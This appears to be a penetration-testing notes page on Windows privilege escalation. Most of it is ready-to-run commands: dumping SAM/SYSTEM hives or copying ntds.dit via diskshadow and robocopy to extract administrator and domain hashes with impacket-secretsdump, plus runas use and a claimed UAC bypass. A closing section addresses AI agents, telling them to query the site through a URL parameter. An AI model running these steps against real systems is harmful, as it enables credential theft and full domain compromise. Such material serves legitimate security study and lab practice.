# Methodology

## SEBackupPrivilege

if you have SEBackup Privilege, then you can access any file on the system. the best way is to get sam and system file and download those to your system and get the administrator hash

<pre class="language-python"><code class="lang-python">
reg save hklm\sam c:\users\username\sam

reg save hklm\system c:\users\username\system


<strong># download sam and system on your kali machine and then use impacket-secretdump
</strong>
impacket-secretsdump -sam sam -system system LOCAL 

</code></pre>

<figure><img src="/files/LHwWq2vga41OcuB3NAwX" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/NsyfVw2qgBQi4LHTloa0" alt=""><figcaption></figcaption></figure>

### Second Method : SEBackupPrivilege (Domain Joined Machines)

We can use the Second Method for Domain Joined Machines&#x20;

Create a file called **test.dsh**

```
persistent nowriters
add volume c: alias owo
create
expose %owo% z:
```

<figure><img src="/files/ZLP09nrn4kgdzU6czZqE" alt=""><figcaption></figcaption></figure>

Upload this file to the target machine and then run the following command

```python
diskshadow /s test.dsh

# then run below command 

robocopy /b z:\windows\ntds . ntds.dit
```

after this you should get ntds.dit file in your current working directory

we also need system file for this to work

```python
reg save hklm\system c:\users\username\system
```

after you can use impacket-secretsdump and get the administrator hash.

```python
impacket-secretsdump -ntds ntds.dit -system system LOCAL 
```

## RUNAS (Changing user Sessions)

```python
runas /user:Administrator cmd # if you have the password of admin user 
```

## Bypassing UAC

we can bypass UAC in rdp session in a powershell shell by running the following command

```python
Start-Process cmd.exe -verb runas # this will give you full Admin Privileges
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.programmersecurity.com/windows-privilege-escalation/methodology.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.